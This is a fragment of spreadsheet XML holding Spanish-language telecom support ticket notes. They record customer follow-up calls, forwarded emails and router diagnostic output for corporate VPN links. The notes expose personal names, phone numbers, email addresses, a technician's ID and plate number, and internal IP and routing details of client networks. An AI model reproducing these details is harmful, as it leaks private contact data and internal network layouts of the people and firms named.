    <t>SE RECIBE LLAMADA DE LUIS MORALES/CLIENTE 52001303 INDICA QUE AHORA NO SACA/NI RECIBE LLAMADAS, SE IBA A APERTURAR NUEVO TICKET POR PROCEDIMIENTO.
SE LLAMA A GESTIÓN AE, CONTESTA ÁNGEL GODÍNEZ/GESTOR AE SE LE EXPLICA EL ESCENARIO, INDICA QUE SE LLEVARÁ CON EL MISMO NÚMERO DE TICKET.</t>
  </si>
  <si>
    <t>F4583794</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 75168286/ ENCARGADO CONTESTA VALERIA FLORES VALIDA SERVICIO OPERATIVO
3001239473
COLA:
NOMBRE: A: 50575168286
NÚMERO: 50575168286
DURACIÓN: 0:06:46
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50575168286
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/05/2022 19:53:56</t>
  </si>
  <si>
    <t>F4583801</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE GLADYS MONTES E INDICA QUE SE COMUNICARÁ CON NELSON MEJÍA PARA APOYAR EN REINICIO DE EQUIPOS. INDICÓ QUE SE LE LLAME EN 5 MINUTOS.</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE WILLI ALVAREZ E INDICA QUE SE LE LLAME EN 10 MINUTOS.</t>
  </si>
  <si>
    <t>SE REALIZÓ LLAMADA A GLADYS MONTES E INDICA QUE NO LE FUE POSIBLE COMUNICARSE CON NELSON MEJÍA, BRINDÓ NUMERO DE WILLI ALVAREZ 51161972 PARA QUE PUEDA SER CONTACTADO Y QUE PUEDA APOYAR CON EL REINICIO DE LOS EQUIPOS.</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE WILLI ALVAREZ E INDICA QUE LLEGARÁ EN 45 MINUTOS APROXIMADAMENTE. SE DARA SEGUMIENTO PARA LLAMADA.</t>
  </si>
  <si>
    <t>F4583808</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4583813</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77363654 VILMA MENCIONA QUE TODAVIA PERSISTE EL INCONVENIENTE
-ID 3001197806
NOMBRE DEL CLIENTE: BODEGA FARMACEUTICA S.A.
UBICACIÓN:6 AV. 6-19 Z.1 RETALHULEU
CONTACTO EN SITIO: VILMA ORDOÑEZ
HORARIO DE ATENCION:8:00 - 9:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 77363654 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001252805
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 77363654 CONTESTA EL SEÑOR RONALD QUIEN CONFIRMA QUE EL SERVICIO YA ESTA ESTABLE Y OPERATIVO **
ID 3001264605
**</t>
  </si>
  <si>
    <t>F4583829</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, SE LLAMÓ A CLIENTE 51044979 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR SAN JOSE AL 51044979 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 3001279213
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR SAN JOSE AL 51044979 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001264149
**</t>
  </si>
  <si>
    <t>F4583875</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA QUE VALIDE ---
673000007T || F4583083 || 20 CALLE ZONA 10</t>
  </si>
  <si>
    <t>**SE LLAMA CARLOS CHENG AL 43246230 INDICA QUE SIGUE IGUAL EL INCONVENIENTE QUE AUN ESTA A 75% LA MEMORIA INDICA QUE ENVIARA PRUEBAS SE LE SOLICITA QUE COPIE A YENSI  || SE NOTIFICA A GESTOR QUE CLIENTE ENVIO EL CORREO **
ID 3001349353
**</t>
  </si>
  <si>
    <t>SE LLAMA A JUAN CARLOS CHENG PARA VALIDAR SERVICIO POR PARTE DE SOC REALIZARON OPTIMIZACION DE MEMORIA--  CLIENTE NO RESPONDE-
POR LADO DE CLARO SERVICIO SE OBSERVA ENTREGANDO DE FORMA CORRECTA SIN TIEMPOS ALTOS Y SE VALIDA PARAMETROS DE FO EN RANGO---</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JUAN CARLOS CHENG AL 43246230 CONTESTA EL SEÑOR CARLOS CHENG QUIEN INDICA QUE AUN TIENE INCONVENIENTES || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001262085
**</t>
  </si>
  <si>
    <t>SE INFORMA A CL SOBRE ESCALACION HACIA EL PROVEEDOR
RE: 673000007T || F4583083 || 20 CALLE ZONA 10</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A  CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 17:03
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; CARLOS ALBERTO CHENG LOPEZ &lt;CARLOS.CHENG@COFAL.COM.GT&gt;; JUAN JOSE MAXIA GARCIA &lt;JUAN.MAXIA@CLARO.COM.GT&gt;; OSCAR DANIEL GIRON REYES &lt;OSCAR.GIRON@CLARO.COM.GT&gt;; JURGEN RENE BOCH CAAL &lt;JURGEN.BOCH@CLARO.COM.GT&gt;; ADMIN.NMISCORPORATIVO &lt;ADMIN.NMISCORPORATIVO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; DIEGO FERNANDO GODOY RECKHOLDER &lt;DIEGO.GODOY@COFAL.COM.GT&gt;; BAUTISTA CASTILLO GABRIEL ALFONSO &lt;GABRIEL.BAUTISTA@CLARO.COM.GT&gt;
ASUNTO: RE: 673000007T || F4583083 || 20 CALLE ZONA 10
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 43246230 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4583902</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE YA TIENEN CERRADO EL TICKET INTERNO
-ID 3001706390 - 3001707020</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 9:12
PARA: ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ CERVANTES SANTIAGO RAUL &lt;SHCERVAN@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 944524 ::: TICKET CNOC IMCRL004774 ::: "LINK DOWN"
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR  JUAN JOSE QUIEN INDICA QUE YA SE SOLICITO INFORMACION A CLIENTE PERO AUN NO RESPONDE QUE CUANDO TENGAN RESPUESTA NOS HARAN LLEGAR LA INFORMACION **
ID 3001255262
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE ESTARA COMPARTIENDO LOS DATOS POR CORREO
-ID 3001460316</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO (NOS DEBE BRINDAR TELS DE PR); NO CONTESTA, SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4583926</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS ARMANDO 97672304 QUIEN SOLICITA LA VISITA PARA MAÑANA EN LA MAÑANA
-ID 3001397838</t>
  </si>
  <si>
    <t>SE VALIDAR SERVIVICIO OPERATIVO PERO CON LENTITUD, CLIENTE SOLICITA DETERMINAR LA CAUSA RAIZ DE LENTITUD, RESPECTO AL SERVICIO CAIDO MENCIONA QUE SE PUDO DEBER A QUE EN SITIO HAY MUCHAS CABLES DESORGANIZADOS Y QUE ENCONTRARON UNO DE ESTOS DECONECTADO.
3001265663
COLA:
NOMBRE: A: 0050497672304
NÚMERO: 0050497672304
DURACIÓN: 0:03:00
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050497672304
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 31/05/2022 08:27:25</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE CARLOS, CONFIRMA DATOS PARA VISITA, POR SI ES NECESARIO VISTAR INSTALACIONES DEL CLIENTE
3001384184
COLA:
NOMBRE: A: 0050497672304
NÚMERO: 0050497672304
DURACIÓN: 0:03:07
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050497672304
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 31/05/2022 13:45:51</t>
  </si>
  <si>
    <t>F4583969</t>
  </si>
  <si>
    <t>SE PROCEDE A ENVIAR COREO PARA PODER SOLICITAR CONTACTO EN DONDE SE ENCUENTRAN LOS EQUIPOS Y PODER REALIZAR UNA REUBICACION DE EQUIPOS.
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 21:22
PARA: NOC@MP.GOB.GT &lt;NOC@MP.GOB.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO. AL TICKET SD1130557
ESTIMADO CLIENTE LE SOLICITAMOS SU APOYO PARA PODER REALIZAR UNAS PRUEBAS CON EL EQUIPO PARA PODER RELIZAR UNA REUBICACIÓN DEL EQUIPO PARA PODER MEJORAR EL ÁREA DE COBERTURA LTE YA QUE ESO ES LO ÚNICO QUE MEJORARÍA EL SERVICIO AGRADESCO SU APOYO.</t>
  </si>
  <si>
    <t>F4584022</t>
  </si>
  <si>
    <t>SE VALIDA QUE A NIVEL WAN SE ENCUENTRA OPERATIVO EL SERVICIO PERO SE TUVO UNA INTERVENCION 5415127   EN RETALHULEULA CUAL PUEDE AFECTAR EN ALGUNA ADYACENCIA EL SERVICIO POR UNOS SEGUNDOS
&lt;SSMASVYWN1D1EID1&gt;PIN -VPN-INSTANCE WALMART 10.130.234.185
  PING 10.130.234.185: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.130.234.185: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.130.234.185: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.130.234.185: BYTES=56 SEQUENCE=3 TTL=255 TIME=1 MS
    REPLY FROM 10.130.234.185: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.130.234.185: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.130.234.185 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
&lt;SSMASVYWN1D1EID1&gt;
PE
&lt;SSMASVYWN1D1EID1&gt;DIS CUR | INCLUDE 10.130.234.185
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 PEER 10.130.234.185
&lt;SSMASVYWN1D1EID1&gt;DIS IP ROUTING-TABLE VPN-INSTANCE WALMART 10.130.234.185
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 10.130.234.185/32  DIRECT  0    0                 0.0.0.0         VLANIF1760
&lt;SSMASVYWN1D1EID1&gt;DIS CUR INTER VLANIF1760
#
INTERFACE VLANIF1760
 DESCRIPTION ENLACES WALMART
 IP BINDING VPN-INSTANCE WALMART
 IP ADDRESS 10.130.234.179 255.255.255.240
 VRRP VRID 1 VIRTUAL-IP 10.130.234.177
 VRRP VRID 2 VIRTUAL-IP 10.130.234.180
 VRRP VRID 2 PRIORITY 110
 OSPF NETWORK-TYPE NBMA
#
RETURN</t>
  </si>
  <si>
    <t>ENLACE AFECTADO POR RIR RETALHULEU 5415127   SE PROCEDE A DEJAR EN MONITOREO PARA VALIDAR AL TEMINAR INTEVENCION</t>
  </si>
  <si>
    <t>F4584074</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO, NO HA BRINDADO TELS DE PR; NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMDHE020516 || ID LOCAL 4318945 || ENLACE CAÍDO</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 9:30
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; CASTAÑEDA CUEVAS CARLOS EMILIO &lt;CCCUEVAS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMDHE020516 || ID LOCAL 4318945 || ENLACE CAÍDO
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5299 NO RESPONDEN, SE INTENTARA LUEGO
-ID 3001293248</t>
  </si>
  <si>
    <t>F4584110</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR JERFERSON CONFIRMA SERVICIO ESTABLE
Y OPERATIVO **
ID 3001418954
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR GERALD TORRES INDICA QUE AUN VE INESTABILIDAD || SE LE NOTIFICA A GESTOR PARA EL SEGUIMIENTO **
ID 3001316473
**</t>
  </si>
  <si>
    <t>F4584114</t>
  </si>
  <si>
    <t>-* SE HABLA CON KEVYN FONSECA (TL) INFORMA QUE SE ESCALO CON RODOLFO ESTRADA, QUIEN INDICO QUE PERSONAL DE POST VENTA SI RECIBIO LA SOLICITUD DE BAJA POR LO QUE TELMEX DEBE VALIDAR EL TEMA CON SU EJECUTIVO, SE ENVÍA CORREO A CLIENTE, A LA ESPERA DE LO QUE INDIQUE -*
-*/
RE: PROBLEMA DE ENRUTAMIENTO || DHL || COSTA RICA || CONTR0001196590OC ||  IMDHG006677</t>
  </si>
  <si>
    <t>NO SE VALIDAN AVANCES Y SE CONTACTA CON EL LINDER KEVIN FONSECA 41284612 ID 3001696808 Y CONFIRMA QUE YA LE BRINDO EL SEGUIMIENTO PERO NO LO COMPARTIÓ Y LO HACE VÍA SKYPE:
CON RESPECTO A ESOS DOS ENLACES BAJAS, INVESTIGAMOS Y TUVIERON CAMBIO RAZON SOCIAL:
NUEVOS :
ENLACE	ID LOCAL
DHL AERO EXPRESO (AVIATION) PRIMARIO	CONTR0002180697OC
DHL AERO EXPRESO (AVIATION) SECUNDARIO	CONTR0002180798OC
REVISAMOS Y AMBOS ENTAN OPERATIVOS :
-WAN UP
-BGP ESTABLECIDA CON PREFIJOS
POR LO QUE COMENTA QUE LA FALLA ACTUAL SE PROCEDA A EL CIERRE EN CONJUNTO CON EL CLIENTE SE NOTIFICA AL GESTOR ALEJANDRO.NAVARRO VIA SKYPE  PARA EL SEGUIMIENTO</t>
  </si>
  <si>
    <t>SE VALIDA QUE YA HAY RESPUESTA EN LA COLA DE CORREOS Y NO HAY SEGUIMIENTO POR PARTE DEL CNOC SE MUEVE A WIP PARA SEGUIR CON EL PROCESO. COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTE CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO.</t>
  </si>
  <si>
    <t>F4584115</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE ENCUANTRA OPERATOVP SIN NINGUN INCONVENIENTE SE PORCEDE A VALIDAR CO CLEINTE .
PING HACIA ROUTER CPE:
PING VRF VPN_DHL-INT_0 187.128.48.142
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 187.128.48.142, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/2/4 MS
RUTA IP:
PE: 10.192.9.67
SHOW IP ROUTE VRF VPN_DHL-INT_0 187.128.48.142
ROUTING TABLE: VPN_DHL-INT_0
ROUTING ENTRY FOR 187.128.48.140/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA BGP 14754
  ADVERTISED BY BGP 14754 ROUTE-MAP VPN-INT
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA BDI720
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1</t>
  </si>
  <si>
    <t>F4584134</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTAN PERO DEJAN EN ESPERA Y NO RETOMAN LLAMADA || SE INTENTARA LUEGO **
ID 3001426597
**</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 10:04
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; MONTIEL FLORES ERICK DANIEL &lt;EMONTIEL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ VAZQUEZ EDGAR JESUS &lt;EHVAZQUE@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0001240249OC::: TICKET CNOC IMDHE020539 ::: FUERA DE SERVICIO
*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO // A LA ESPERA DE LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 15:40
PARA: ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; MONTIEL FLORES ERICK DANIEL &lt;EMONTIEL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; HERNANDEZ VAZQUEZ EDGAR JESUS &lt;EHVAZQUE@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0001240249OC::: TICKET CNOC IMDHE020539 ::: FUERA DE SERVICIO
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN: SAN ANTONIO DEL TEJAR - ALAJUELA - EDIFICIO TERMINALES SANTAMARIA,  ROTULO DE DHL COLOR BLANCO GRIS MANO IZQ
ADJUNTAMOS LOS DATOS DEL TÉCNICO
ALEXANDER VELASQUEZ
CED. 800880499
PLACA CL-323006
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5299 CONTESTA EL SEÑOR GILBERTO ROMANO  INDICA QUE AUN NO SE TIENEN ACCESOS INDICA QUE SE VERIFIQUE EN LAS PROXIMAS HORAS || SE NOTIFICA A GESTOR **
ID 3001426597 - 3001456070
**</t>
  </si>
  <si>
    <t>F4584141</t>
  </si>
  <si>
    <t>ENALCE OEPRATIVO SE RPOCEDE CON CIERRE DE TICKET POR PROBLEMAS DE ENERGIA COMERCIAL
&lt;NSMAGTSMN1C1B06B02EIM1&gt;PIN -VP  BANTRAB2 10.16.194.130
  PING 10.16.194.130: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.16.194.130: BYTES=56 SEQUENCE=1 TTL=255 TIME=2 MS
    REPLY FROM 10.16.194.130: BYTES=56 SEQUENCE=2 TTL=255 TIME=2 MS
    REPLY FROM 10.16.194.130: BYTES=56 SEQUENCE=3 TTL=255 TIME=2 MS
    REPLY FROM 10.16.194.130: BYTES=56 SEQUENCE=4 TTL=255 TIME=2 MS
    REPLY FROM 10.16.194.130: BYTES=56 SEQUENCE=5 TTL=255 TIME=2 MS
  --- 10.16.194.130 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 2/2/2 MS
&lt;NSMAGTSMN1C1B06B02EIM1&gt;
PE 10.179.28.34
&lt;NSMAGTSMN1C1B06B02EIM1&gt;DIS  CUR | IN 10.16.194.130
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
IP ROUTE-STATIC VPN-INSTANCE BANTRAB2 10.212.127.238 255.255.255.255 10.16.194.130 DESCRIPTION MON_42700354
IP ROUTE-STATIC VPN-INSTANCE BANTRAB2 172.28.1.204 255.255.255.252 10.16.194.130 DESCRIPTION 42700354
&lt;NSMAGTSMN1C1B06B02EIM1&gt;DIS IP ROUTI
&lt;NSMAGTSMN1C1B06B02EIM1&gt;DIS IP ROUTING-TABLE VP  BANTRAB2 10.16.194.130
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANTRAB2
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.16.194.130/32  DIRECT  0    0                 0.0.0.0         VLANIF314
&lt;NSMAGTSMN1C1B06B02EIM1&gt;DIS CUR INTER  VLANIF314
#
INTERFACE VLANIF314
 DESCRIPTION BANTRAB2
 IP BINDING VPN-INSTANCE BANTRAB2
 IP ADDRESS 10.72.194.89 255.255.255.248
 IP ADDRESS 10.16.194.129 255.255.255.248 SUB
 ARP EXPIRE-TIME 300
 UNDO ICMP NAME NET-UNREACHABLE SEND
 UNDO ICMP NAME HOST-UNREACHABLE RECEIVE
 UNDO ICMP NAME PROTOCOL-UNREACHABLE RECEIVE
 UNDO ICMP NAME PORT-UNREACHABLE SEND
 UNDO ICMP NAME REDIRECT RECEIVE
#
RETURN</t>
  </si>
  <si>
    <t>F4584166</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER ALBERTO  AL 2239-9709 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001268185
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEXANDER ALBERTO  AL 2239-9709 OPERADORA INDICA QUE NO HAY NADIE DISPONIBLE PARA ATENDER LLAMADA || SE INTENTARA LUEGO **
ID 3001257384
**</t>
  </si>
  <si>
    <t>F4584185</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE NAJERA AL 44972260 SOLICITA QUE SE LE LLAME AL SEÑOR WILIAM CANO AL 42022556 **
ID 3001257603
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILIAM CANO AL 42022556 INDICA QUE AUN PERSISTE EL INCONVENIENTE || SE NOTIFICA A GESTOR **
ID 3001257771
**</t>
  </si>
  <si>
    <t>F4584190</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARCO ANTONIO 50188573 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001304336</t>
  </si>
  <si>
    <t>F4584220</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BAIRON BARILLAS AL 73967980 || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001281218
**</t>
  </si>
  <si>
    <t>F4584231</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174-5299 MENCIONA QUE YA TIENEN CERRADO EL TICKET INTERNO
-ID  3001707020</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174-5299 MENCIONA QUE ESTARAN COMPARTIENDO EL CONTACTO DE PR POR CORREO
-ID 3001308327</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO, NO HA BRINDADO TELS DE PR; NO CONTESTA; SE DEBE INTENTAR MÁS TARDE, ADICIONAL SE LE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE :BIMBO INTERNACIONAL - GB BNI LEON - G74-AG00006NI-NI0619F-NP (4685415) - LINK DOWN || IMBBL004068</t>
  </si>
  <si>
    <t>F4584241</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A BANRURAL SOLICITANDO ACCESOS PARA SABADO O LUNES YA QUE SUPERVISOR INDICA QUE MAÑANA HAY FERIADO EN EL LUGAR ||
ERITO FERNANDO TECU XITUMUL
ASUNTO: VISITA TÉCNICA 8902418T || AGENCIA 9 | UBICACIÓN REDUNDANCIA. 8 AV. Y 9 CALLE PUERTO BARRIO IZABAL
BUENA TARDE ESTIMADOS BANRURAL.
EN SEGUIMIENTO AL SERVICIO 8902418T  || AGENCIA 9 | UBICACIÓN REDUNDANCIA. 8 AV. Y 9 CALLE PUERTO BARRIO IZABAL. LE COMENTO QUE POR MONITOREO PROACTIVO SE TIENE ALARMADO EL SERVICIO REDUNDANTE DE LA AGENCIA POR LO CUAL SE ESTÁ COORDINANDO UNA VISITA TÉCNICA PARA VERIFICAR EL SERVICIO EL DÍA SÁBADO 04/06 O EL LUNES 06/06 A PARTIR DE LAS 9:00 HRS, YA QUE NOS COMENTA SUPERVISOR DEL ÁREA QUE EL DÍA DE MAÑANA VIERNES HAY FERIADO EN PUERTO BARRIOS.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>F4584248</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FABIAN HERNANDEZ AL 50585888163 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001273137
**</t>
  </si>
